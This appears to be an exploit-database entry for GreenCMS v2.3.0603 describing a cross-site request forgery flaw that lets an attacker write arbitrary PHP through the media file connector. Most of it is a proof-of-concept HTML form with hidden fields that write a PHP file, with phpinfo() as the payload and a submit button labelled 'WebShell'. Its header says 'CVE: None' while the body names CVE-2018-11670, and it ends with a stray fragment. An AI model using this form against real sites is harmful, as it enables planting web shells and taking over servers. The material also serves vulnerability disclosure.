GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution Vulnerabilities

ID: 98282
CVE: None
Download vulnerable application: None
# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell
# Exploit Author: xichao
# Vendor Homepage:
# Software Link:
# Version: v2.3.0603
# CVE : CVE-2018-11670
   An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that
allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect.
  <span style="font-size:18px;"><!DOCTYPE html> 
<html lang="en"> 
    <meta charset="UTF-8"> 
<form action="" method="POST" id="transfer" name="transfer">
    <script src=""></script>
    <input type="hidden" name="cmd" value="put">
    <input type="hidden" name="target" value="l1_eGMucGhw">
    <input type="hidden" name="content" value="<?php phpinfo();?>">
    <button type="submit" value="Submit">WebShell</button>
1-4-2 (www01)